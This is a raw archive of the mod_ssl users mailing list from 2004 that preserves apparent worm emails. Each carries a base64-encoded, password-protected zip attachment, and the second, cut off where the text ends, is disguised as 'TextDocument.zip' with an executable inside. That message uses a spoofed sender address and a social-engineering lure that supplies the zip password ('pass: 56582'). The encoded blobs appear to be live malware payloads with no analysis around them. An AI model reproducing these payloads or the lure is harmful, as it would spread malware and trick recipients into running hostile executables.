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
AP1VAAAAAA==

----------gtdwaklqcnwephadrsmb--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Mar  2 15:31:21 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id BC2ABA8AA3; Tue,  2 Mar 2004 15:31:21 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.centralstates.org (mail.centralstatesfunds.org [204.80.213.38])
	by master.modssl.org (Postfix) with SMTP id 00A58A8A97
	for ; Tue,  2 Mar 2004 15:31:20 +0100 (CET)
Received: from no.name.available by mail.centralstates.org
          via smtpd (for [195.27.176.156]) with SMTP; 2 Mar 2004 14:31:18 UT
Date: Tue, 02 Mar 2004 08:31:17 -0600
To: modssl-users@modssl.org
Subject: ^_^ meay-meay!
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------xabmefofwccrmelakacx"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------xabmefofwccrmelakacx
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit

Argh,  i don't  like  the plaintext :)

pass:  56582

----------xabmefofwccrmelakacx
Content-Type: application/octet-stream; name="TextDocument.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="TextDocument.zip"

UEsDBAoAAQAAAGBDYjB6lvbwDlEAAAJRAAAMAAAAZ2t4ZXJiZ3IuZXhlRaS3Wyf1DOViNWPm
ron00oQBDYRAYNGD0rgFQYS8hQy1c9uTp6LaY5YFE9XWil91Frw/gQRVPSkCrwScV7Jci3Q4
QyPOYvJsNmAZFTZ+MSlMOEgO3Vaid5dOYdNhc/8zmymvvJ4LwqVV4GKDBApl0PC85RhrdtQ5
Cu4pmkmg7OwV7dIGfKFaQVqNRp5Fh0KxePXYSj+3RHg7suMI+pQwOemwfDirhujN3IPSQtP1
ZQbPNJeAb5nJay6zxKxpHKNNzma5LXbRq33MBXm5WD5Zo0ItS18VFT/x194oHniccqNwTsag
47QFgzQ9GKqQkaiQGqvCfg4ejY/3Iy2BX6mtd4CKHFYxxzFD8MfwaD6++7zzxM+Mc4pP3KdD
IV4HxBxqQk1aqVQ+tGnKs9e7l+UoHZwodQN678033QyCrSTv5uc1+Xa/h2Tm6fjOzR5/T1cT
IQDbqAgjj3j7wRmRwh5mZ5hZGPtFR42/LsOcnQK2U1mPmwLfEncZ7DrrF2MFj2KZdSHoJeFN
HXco+HHvLFDhbR97c7Jj/M8PDDX05Mf5gmarFs1Perhc11Q2pHFwFS59Q0M1Bw3RelZHCwwI
vXCseDf5te07FgJHsASe8ssZnYGa2Adf1kGSeytCjQAUn4z32gdfEAeyfY1QVkEMrO+qTYX0
9Zci93A6RoMsyIplzyET3N+/aBnVgi1FisLOlAgIeEB0/zauX3CSXeyIRdUtJN8QWr7Si8du
x6HUJJWoQms/Ll57lrnctJ5unsWpywo+RviOpFH5ulkPshjxdS6OfRX48x+uWE3bxz1Hn0Vb
xcSVIJ1xnh7YvEAHL1QPaJJjSLnOjpPcPzEVnDr6cjGQ4QZYrhFm9O8+DrcDKQzyjrlkBX49
TmQOLOLU11xT+cNoaIciz4WZsVuyZeJUJ/ScswXfPF3+MJtRmOeOI7mvzbKJMCkHtSketUEz
BNquxyY8aAY7rHcisbvuSJOIijT250jjWKaV/aqSRjkEeJ7S/VFgPNUDtnFZkqVqhHocf4nh
sf4MfhuGS7MBStVgdmtLywth9Ms8EukorTmtPEkyM0RG54i0ZGrrgreeagy8EWZP2imPCjUc
/OBR+7BMW0ZzyeidXn/oay1Imao8l9KqmR48ohcBwKO9aMu2NwuiAOWmWjHNZd5G8p8QPTJp
MM8bywcgPqhDWq/4OIRkq2OD19RnQDgOhAR4m01jOerVS/ZieyiiGUvSy4AU4aFNugFpo2/p
